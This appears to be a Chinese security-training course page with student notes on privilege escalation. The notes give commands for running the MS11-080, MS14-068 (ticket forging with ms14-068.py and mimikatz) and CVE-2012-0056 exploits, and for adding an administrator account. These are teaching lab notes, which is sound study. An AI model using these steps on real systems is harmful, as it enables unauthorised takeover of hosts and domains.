默认计划
929人加入学习
(11人评价)
安全测试提权

购买过Kali Linux渗透测试、武官课程包、安全技术会员课程的学员不要再买此课程

价格 ¥ 300.00
该课程属于 高校公益行 | 网络安全实践训练营 请加入后再学习

之前提权是已经是系统管理员的权限的情况提示成为system 或者是已有操作系统管理权限查看密码

登陆到操作系统 但是操作权限很低

通过域的组策略来统一的管理 控制员工账号 

从普通到system 利用操作系统漏洞 特有的漏洞

实现提权目的 

windows操作系统实例 :没有安装很多补丁 就利用这个漏洞提升权限

python的脚本放在windows里面需要解释性语言环境 否则windows可能将他看成txt文档

如果说打印好补丁 利用代码就失去作用

[展开全文]

Ms11-080: searchsploit 

    用于XP 与 2K3 ENG 的提权漏洞

 

Pyinstaller:其本身是一个py脚本,需要py环境

    Https://pypi.python.org/pypi/Pyinstaller/2.1

    用于将PY漏洞利用脚本转换为EXE

    使用时加上 --onefile 这个选项,这样才能将目标需要的库环境加载到一个文件

 

Pywin32:

    Http://sourceforge.net/projects/pywin32/files/pywin32/build%20219/

    Pyinstaller需要的一个软件

 

 

Ms11-046:

    用于DOS攻击

 

 

 

 

 

Ms14-068:

    在拥有主机的管理员权限的条件下,通过该漏洞获得域管理员权限

  

    库(Kali中使用脚本缺少库解决方法,下载后放到python目录)

    Https://github.com/bidord/pykek

 

    实验步骤:

    1、使用win 7(过程中关闭防火墙,防止干扰)作为域中普通用户,2k8 server作为域控制器(运行-dcpromo:安装域控制器)

    2、searchsploit

    3、通过脚本生成票据文件:

        ms14-068.py -u user@domain.com -s userSID -d domian.com(完整的域控制器域名或者IP)

    4、将3生成的票据拷贝到Windows中

    5、在本地管理员用户(非域账户)下

        mimikatz.exe log “kerberos::ptc TGT_user@domain.com.ccache” exit

         然后在本地管理员用户下具有了域控制权限

 

注意:

    步骤3中最后的域控制器完整域名,要求我们使用脚本的计算机能够解析,如果不行则使用IP,但是要求计算机与域控制器在同一IP地址段

    步骤3中的userSID,可以通过whoami.exe /all 或者其他工具查找

 

 

 

 

Ubuntu 11.10:unix内核漏洞,进程的内存控制不严格

    kernel>=2.6.39

    该漏洞文章:http://blog.zx2c4.com/749

    http://old-releases.ubuntu.com/releases/11.10/

 

Gcc:

    sudo apt-cdrom add && sudo apt-get install gcc

    gcc 18411.c -o exp

 

本次利用漏洞:

    CVE-2012-0056

 

步骤:

1、在kali中找到可利用漏洞的利用代码:

    

2、将其复制到Ubuntu(Ubuntu server)中:

3、gcc  18411.c -o exp:

    生成可执行程序,运行之后就为root用户

[展开全文]

searchsploit ms11-080    //寻找漏洞利用代码

pyinstaller        //实现把Python脚本转换成exe应用程序

pywin32           //pyinstaller会调用pywin32的功能

利用漏洞提权

>找漏洞利用代码

  • pyinstaller
  • pywin32
  • 以上俩工具是将python转换成exe

将漏洞利用代码文件(18176.py)放到pyinstaller文件夹下,pyinstaller文件夹放到python27文件夹下,

..\python.exe pyinstaller.py --onefile 18176.py

   //--onefile 将需要调用的库文件和外置扩展文件包含到一个exe里面

运行即可提权system

net localgroup administraters a /add

[展开全文]

利用漏洞提权

>找漏洞利用代码

searchsploit ms11-080(漏洞)
  • pyinstaller
  • pywin32
  • 以上俩工具是将python转换成exe

将漏洞利用代码文件(18176.py)放到pyinstaller文件夹下,pyinstaller文件夹放到python27文件夹下,

..\python.exe pyinstaller.py --onefile 18176.py

运行即可提权system

[展开全文]

授课教师

安全经理

课程特色

视频(16)
下载资料(1)